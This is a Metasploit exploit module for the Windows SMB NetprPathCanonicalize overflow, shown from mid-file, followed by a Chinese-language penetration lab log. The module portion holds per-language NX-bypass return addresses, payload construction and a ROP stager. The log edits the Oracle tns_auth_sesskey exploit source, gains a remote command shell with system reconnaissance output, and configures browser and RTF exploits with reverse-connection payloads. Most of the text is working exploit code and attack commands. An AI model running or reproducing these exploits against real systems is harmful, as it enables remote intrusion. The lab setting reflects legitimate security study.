['Windows 2003 SP1 English (NO NX)',
{
'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
['Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 Japanese (NO NX)',
{
'Ret' => 0x71a921a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 Spanish (NO NX)',
{
'Ret' => 0x71ac21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
['Windows 2003 SP1 Spanish (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
# Added by Omar MEZRAG - 0xFFFFFF
[ 'Windows 2003 SP1 French (NO NX)',
{
'Ret' => 0x71ac1c40 ,
'Scratch' => 0x00020408
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
# Added by Omar MEZRAG - 0xFFFFFF
[ 'Windows 2003 SP1 French (NX)',
{
'RetDec' => 0x7CA2568C, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7CB47CF4, # push ESI, pop EBP, ret 4 @SHELL32.DLL
'JmpESP' => 0x7C98FED3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7C95E413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 German (NO NX)',
{
'Ret' => 0x71a03969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 German (NX)',
{
'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Portuguese (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
[ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 Spanish (NO NX)',
{
'Ret' => 0x71ac3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 Spanish (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
# Provided by Masashi Fujiwara
['Windows 2003 SP2 Japanese (NO NX)',
{
'Ret' => 0x71a91ed2,
'Scratch' => 0x00020408
}
], # JMP ESI WS2HELP.DLL
# Standard return-to-ESI without NX bypass
# Added by Omar MEZRAG - 0xFFFFFF
[ 'Windows 2003 SP2 French (NO NX)',
{
'Ret' => 0x71AC2069,
'Scratch' => 0x00020408
}
], # CALL ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
# Added by Omar MEZRAG - 0xFFFFFF
[ 'Windows 2003 SP2 French (NX)',
{
'RetDec' => 0x7C98BEB8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7CB3E84E, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7C98A01B, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7C95F517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Chinese - Simplified (NX)',
{
'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Czech (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Dutch (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Hungarian (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Italian (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Russian (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Swedish (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 Turkish (NX)',
{
'RetDec' => 0x7c96beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c96a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c93f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
#
# Missing Targets
# Key: T=TODO ?=UNKNOWN U=UNRELIABLE
#
# [?] Windows Vista SP0 - Not tested yet
# [?] Windows Vista SP1 - Not tested yet
#
],
'DisclosureDate' => '2008-10-28'))
register_options(
[
OptString.new('SMBPIPE', [true, 'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),
])
deregister_options('SMB::ProtocolVersion')
end
#
#
# *** WINDOWS XP SP2/SP3 TARGETS ***
#
#
# This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
# for the process and then returns back to a call ESI instruction. These addresses are different
# between operating systems, service packs, and language packs, but the steps below can be used to
# add new targets.
#
#
# If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and
# DisableNX elements of the target hash.
#
# If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
# First obtain the value for the Ret element of the hash with the following command:
#
# $ msfpescan -j esi acgenral.dll
#
# Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
#
# Next, find the location of the function we use to disable NX. Use the following command:
#
# $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
#
# This address should be placed into the DisableNX element of the target hash.
#
# The Scratch element of 0x00020408 should work on all versions of Windows
#
# The actual function we use to disable NX looks like this:
#
# push 4
# lea eax, [ebp+arg_0]
# push eax
# push 22h
# push 0FFFFFFFFh
# mov [ebp+arg_0], 2
# call ds:__imp__NtSetInformationProcess@16
#
#
# *** WINDOWS XP NON-NX TARGETS ***
#
#
# Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
# jump, and finally the shellcode.
#
#
# *** WINDOWS 2003 SP2 TARGETS ***
#
#
# There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,
# both of these are inside NTDLL.DLL and use a return method that is not directly compatible
# with our call stack. To solve this, Brett Moore figured out a multi-step return call chain
# that eventually leads to the NX bypass function.
#
#
# *** WINDOWS 2000 TARGETS ***
#
#
# No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
# jump, and finally the shellcode.
#
#
# *** WINDOWS VISTA TARGETS ***
#
# Currently untested, will involve ASLR and NX, should be fun.
#
#
# *** NetprPathCanonicalize IDL ***
#
#
# NET_API_STATUS NetprPathCanonicalize(
# [in, string, unique] SRVSVC_HANDLE ServerName,
# [in, string] WCHAR* PathName,
# [out, size_is(OutbufLen)] unsigned char* Outbuf,
# [in, range(0,64000)] DWORD OutbufLen,
# [in, string] WCHAR* Prefix,
# [in, out] DWORD* PathType,
# [in] DWORD Flags
# );
#
def exploit
begin
connect(versions: [1])
smb_login
rescue Rex::Proto::SMB::Exceptions::LoginError => e
if e.message =~ /Connection reset/
print_error('Connection reset during login')
print_error('This most likely means a previous exploit attempt caused the service to crash')
return
else
raise e
end
end
# Use a copy of the target
mytarget = target
if target['auto']
mytarget = nil
print_status('Automatically detecting the target...')
fprint = smb_fingerprint
print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")
# Bail early on unknown OS
if (fprint['os'] == 'Unknown')
fail_with(Failure::NoTarget, 'No matching target')
end
# Windows 2000 is mostly universal
if (fprint['os'] == 'Windows 2000')
mytarget = targets[1]
end
# Windows XP SP0/SP1 is mostly universal
if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'
mytarget = targets[2]
end
# Windows 2003 SP0 is mostly universal
if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?
mytarget = targets[3]
end
# Windows 2003 R2 is treated the same as 2003
if (fprint['os'] == 'Windows 2003 R2')
fprint['os'] = 'Windows 2003'
end
# Service Pack match must be exact
if (not mytarget) and fprint['sp'].index('+')
print_error('Could not determine the exact service pack')
print_error("Auto-targeting failed, use 'show targets' to manually select one")
disconnect
return
end
# Language Pack match must be exact or we default to English
if (not mytarget) and fprint['lang'] == 'Unknown'
print_status('We could not detect the language pack, defaulting to English')
fprint['lang'] = 'English'
end
# Normalize the service pack string
fprint['sp'].gsub!(/Service Pack\s+/, 'SP')
unless mytarget
targets.each do |t|
# Prefer AlwaysOn NX over NX, and NX over non-NX
if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(AlwaysOn NX\)/
mytarget = t
break
end
if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \(NX\)/
mytarget = t
break
end
end
end
unless mytarget
fail_with(Failure::NoTarget, 'No matching target')
end
print_status("Selected Target: #{mytarget.name}")
end
#
# Build the malicious path name
#
padder = [*('A'..'Z')]
pad = 'A'
while pad.length < 7
c = padder[rand(padder.length)]
next if pad.index(c)
pad += c
end
prefix = '\\'
path = ''
server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
#
# Windows 2003 SP2 (NX) targets
#
if mytarget['RetDec']
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room
jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space
jumper[ 8, 4] = [mytarget['RetDec']].pack('V')
jumper[ 12, 4] = [mytarget['RetDec']].pack('V')
jumper[ 16, 4] = [mytarget['RetDec']].pack('V')
jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP
jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')
jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')
jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')
jumper[ 64, 2] = "\xeb\x02" # our jump
jumper[ 68, 2] = "\xeb\x62" # original
path =
Rex::Text.to_unicode('\\') +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Shellcode
payload.encoded +
# Relative path to trigger the bug
Rex::Text.to_unicode('\\..\\..\\') +
# Extra padding
Rex::Text.to_unicode(pad) +
# Writable memory location (static)
[mytarget['Scratch']].pack('V') + # EBP
# Return to code which disables NX (or just the return)
[mytarget['RetDec']].pack('V') +
# Padding with embedded jump
jumper +
# NULL termination
"\x00" * 2
#
# Windows XP SP2/SP3 ROP Stager targets
#
elsif mytarget['UseROP']
rop = generate_rop(mytarget['UseROP'])
path =
Rex::Text.to_unicode('\\') +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Shellcode
payload.encoded +
# Relative path to trigger the bug
Rex::Text.to_unicode('\\..\\..\\') +
# Extra padding
Rex::Text.to_unicode(pad) +
# ROP Stager
rop +
# Padding (skipped)
Rex::Text.rand_text_alpha(2) +
# NULL termination
"\x00" * 2
#
# Windows 2000, XP (NX), and 2003 (NO NX) targets
#
else
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[ 4, 4] = [mytarget.ret].pack('V')
jumper[50, 8] = make_nops(8)
jumper[58, 2] = "\xeb\x62"
path =
Rex::Text.to_unicode('\\') +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Shellcode
payload.encoded +
# Relative path to trigger the bug
Rex::Text.to_unicode('\\..\\..\\') +
# Extra padding
Rex::Text.to_unicode(pad) +
# Writable memory location (static)
[mytarget['Scratch']].pack('V') + # EBP
# Return to code which disables NX (or just the return)
[mytarget['DisableNX'] || mytarget.ret].pack('V') +
# Padding with embedded jump
jumper +
# NULL termination
"\x00" * 2
end
handle = dcerpc_handle(
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
dcerpc_bind(handle)
stub =
NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(rand(1024)) +
NDR.wstring(prefix) +
NDR.long(4097) +
NDR.long(0)
# NOTE: we don't bother waiting for a response here...
print_status('Attempting to trigger the vulnerability...')
dcerpc.call(0x1f, stub, false)
# Cleanup
handler
disconnect
end
def check
begin
connect(versions: [1])
smb_login
rescue Rex::ConnectionError => e
vprint_error("Connection failed: #{e.class}: #{e}")
return Msf::Exploit::CheckCode::Unknown
rescue Rex::Proto::SMB::Exceptions::LoginError => e
if e.message =~ /Connection reset/
vprint_error('Connection reset during login')
vprint_error('This most likely means a previous exploit attempt caused the service to crash')
return Msf::Exploit::CheckCode::Unknown
else
raise e
end
end
#
# Build the malicious path name
# 5b878ae7 "db @eax;g"
prefix = '\\'
path =
"\x00\\\x00/" * 0x10 +
Rex::Text.to_unicode('\\') +
Rex::Text.to_unicode('R7') +
Rex::Text.to_unicode('\\..\\..\\') +
Rex::Text.to_unicode('R7') +
"\x00" * 2
server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
begin
# Samba doesn't have this handle and returns an ErrorCode
dcerpc_bind(handle)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
vprint_error("SMB error: #{e.message}")
return Msf::Exploit::CheckCode::Safe
end
vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)
stub =
NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(8) +
NDR.wstring(prefix) +
NDR.long(4097) +
NDR.long(0)
resp = dcerpc.call(0x1f, stub)
error = resp[4, 4].unpack('V')[0]
# Cleanup
simple.client.close
simple.client.tree_disconnect
disconnect
if (error == 0x0052005c) # \R :)
return Msf::Exploit::CheckCode::Vulnerable
else
vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
return Msf::Exploit::CheckCode::Safe
end
end
def generate_rop(version)
free_byte = "\x90"
# free_byte = "\xcc"
# create a few small gadgets
# <free byte>; pop edx; pop ecx; ret
gadget1 = free_byte + "\x5a\x59\xc3"
# mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd
gadget2 = free_byte + "\x89\xc7" + "\x83\xc7\x0c" + "\x6a\x7f" + "\x59" + "\xf2\xa5" + free_byte
# <must complete \x00 two byte opcode>; <free_byte>; jmp $+0x5c
gadget3 = "\xcc" + free_byte + "\xeb\x5a"
# gadget2:
# get eax into edi
# adjust edi
# get 0x7f in ecx
# copy the data
# jmp to it
#
dws = gadget2.unpack('V*')
##
# Create the ROP stager, pfew.. Props to corelanc0d3r!
# This was no easy task due to space limitations :-/
# -jduck
##
module_name = 'ACGENRAL.DLL'
module_base = 0x6f880000
rvasets = {}
# XP SP2
rvasets['5.1.2600.2180'] = {
# call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret
'call_HeapCreate' => 0x21064,
'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,
'pop ecx / ret' => 0x2e546 + 6,
'mov [eax], ecx / ret' => 0xd182,
'jmp eax' => 0x19b85,
'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,
'mov [eax+0x10], ecx / ret' => 0x10976 + 6,
'add eax, 8 / ret' => 0x29a14
}
# XP SP3
rvasets['5.1.2600.5512'] = {
# call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret
'call_HeapCreate' => 0x21286,
'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,
'pop ecx / ret' => 0x2e796 + 6,
'mov [eax], ecx / ret' => 0xd296,
'jmp eax' => 0x19c6f,
'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,
'mov [eax+0x10], ecx / ret' => 0x10a56 + 6,
'add eax, 8 / ret' => 0x29c64
}
# HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180
rop = [
# prime ebp (adjustment distance)
0x00018000,
# get some RWX memory via HeapCreate
'call_HeapCreate',
0x01040110, # flOptions (gets & with 0x40005)
0x01010101,
0x01010101,
# adjust the returned pointer
'add eax, ebp / mov ecx, 0x59ffffa8 / ret',
# setup gadget1
'pop ecx / ret',
gadget1.unpack('V').first,
'mov [eax], ecx / ret',
# execute gadget1
'jmp eax',
# setup gadget2 (via gadget1)
dws[0],
dws[1],
'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',
# setup part3 of gadget2
'pop ecx / ret',
dws[2],
'mov [eax+0x10], ecx / ret',
# execute gadget2
'add eax, 8 / ret',
'jmp eax',
# gadget3 gets executed after gadget2 (luckily)
gadget3.unpack('V').first
]
# convert the meta rop into concrete bytes
rvas = rvasets[version]
rop.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
module_base + rvas[e]
elsif e == :unused
# Randomize
rand_text(4).unpack('V').first
else
# Literal
e
end
}
ret = rop.pack('V*')
# check badchars?
# idx = Rex::Text.badchar_index(ret, payload_badchars)
ret
end
end
Oracle tns_auth_sesskey
use exploit/windows/oracle/tns_auth_sesskey
set payload windows/meterpreter/reverse_tcp
set RHOSTS 10.10.10.130
set LHOST 10.10.10.128
set LPORT 5000
set target 1
exploit
msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit
[*] Started reverse TCP handler on 10.10.10.128:5000
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Exploit completed, but no session was created.
提示“no session was created”
根据书中提示信息,修改tns_auth_sesskey.rb源代码
C:\metasploit-framework\embedded\framework\modules\exploits\windows\oracle\tns_auth_sesskey.rb
# build exploit buffer
print_status("Calling kpoauth with long AUTH_SESSKEY ...")
sploit = payload.encoded
sploit << rand_text_alphanumeric(0x19a - 0x17e)
sploit << generate_seh_record(mytarget.ret)
distance = payload_space + 8 + 5
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
# ensure bad ptr is derefed
value = rand(0x3fffffff) | 0xc0000000
sploit[0x17e,4] = [value].pack('V')
# send overflow trigger packet (call kpoauth)
params = []
params << {
'Name' => 'AUTH_SESSKEY',
'Value' => sploit,
'Flag' => 1
}
dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
sock.put(dtyauth_pkt)
修改为
# build exploit buffer
print_status("Calling kpoauth with long AUTH_SESSKEY ...")
sploit = payload.encoded
sploit << rand_text_alphanumeric(0x19a - 0x17e + 0x10)
sploit << generate_seh_record(mytarget.ret)
distance = payload_space + 8 + 5 + 0x20
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
# ensure bad ptr is derefed
value = rand(0x3fffffff) | 0xc0000000
sploit[0x17e,4] = [value].pack('V')
# send overflow trigger packet (call kpoauth)
params = []
params << {
'Name' => 'AUTH_SESSKEY',
'Value' => sploit,
'Flag' => 1
}
dtyauth_pkt = dtyauth_packet(0x73, username, 0x121, params)
sock.put(dtyauth_pkt)
根据桌面上的oracle startup.txt中提示信息,启动Oracle
C:\oracle\product\10.2.0\db_1\BIN\sqlplus.exe /nolog
conn sys/mima1234 as sysdba
startup
msf6 exploit(windows/oracle/tns_auth_sesskey) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 10.10.10.128:5000
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Sending stage (175174 bytes) to 10.10.10.130
[*] Exploit completed, but no session was created.
提示“no session was created”,更换payload为windows/shell/bind_tcp
use exploit/windows/oracle/tns_auth_sesskey
set payload windows/shell/bind_tcp
set RHOSTS 10.10.10.130
set LHOST 10.10.10.128
set LPORT 4555
set target 1
exploit
msf6 exploit(windows/oracle/tns_auth_sesskey) > exploit
[*] 10.10.10.130:1521 - Attacking using target "Oracle 10.2.0.1.0 Enterprise Edition"
[*] 10.10.10.130:1521 - Sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Re-sending NSPTCN packet ...
[*] 10.10.10.130:1521 - Sending NA packet ...
[*] 10.10.10.130:1521 - Sending TTIPRO packet ...
[*] 10.10.10.130:1521 - Sending TTIDTY packet ...
[*] 10.10.10.130:1521 - Calling OSESSKEY ...
[*] 10.10.10.130:1521 - Calling kpoauth with long AUTH_SESSKEY ...
[*] Started bind TCP handler against 10.10.10.130:4555
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.130
[*] Command shell session 26 opened (10.10.10.128:3719 -> 10.10.10.130:4555 ) at 2022-04-23 20:10:07 +0800
Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----
C:\oracle\product\10.2.0\db_1\DATABASE>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.10.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.254
C:\oracle\product\10.2.0\db_1\DATABASE>systeminfo
systeminfo
Host Name: ROOT-TVI862UBEH
OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version: 5.2.3790 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: root
Registered Organization:
Product ID: 69713-640-9722366-45109
Original Install Date: 11/15/2011, 9:50:15 PM
System Up Time: 242 Days, 0 Hours, 52 Minutes, 4 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 14 Stepping 10 GenuineIntel ~2112 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory: 767 MB
Available Physical Memory: 67 MB
Page File: Max Size: 2,474 MB
Page File: Available: 1,295 MB
Page File: In Use: 1,179 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: File 1
[02]: Q147222
[03]: KB893803v2 - Update
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.130
客户端渗透
MS11050
search ms11_050
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
set SRVHOST 0.0.0.0
set SRVPORT 8080
set LHOST 10.10.10.128
set LPORT 4444
set target 1
set URIPATH ms11050
exploit
msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] Using URL: http://10.10.10.128:8080/ms11050
[*] Server started.
提示信息,攻击目标需要访问以下URL
http://10.10.10.128:8080/ms11050
因攻击目标内置IE6,非漏洞版本IE7,需要下载IE7后访问URL
https://www.download3k.com/Install-Internet-Explorer.html
https://www.microsoft.com/ja-jp/download/details.aspx?id=41071
在IE7中访问URL
http://10.10.10.128:8080/ms11050
Metasploit中接收到信息
[*] 192.168.10.128 ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
没有获得权限,IE7安装程序可能存在问题
更换攻击目标为Windows 7 IE8后,浏览器崩溃,仍无法获得权限
MS10087
search ms10_087
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
set CMD calc.exe
set FILENAME ms10087.rtf
exploit
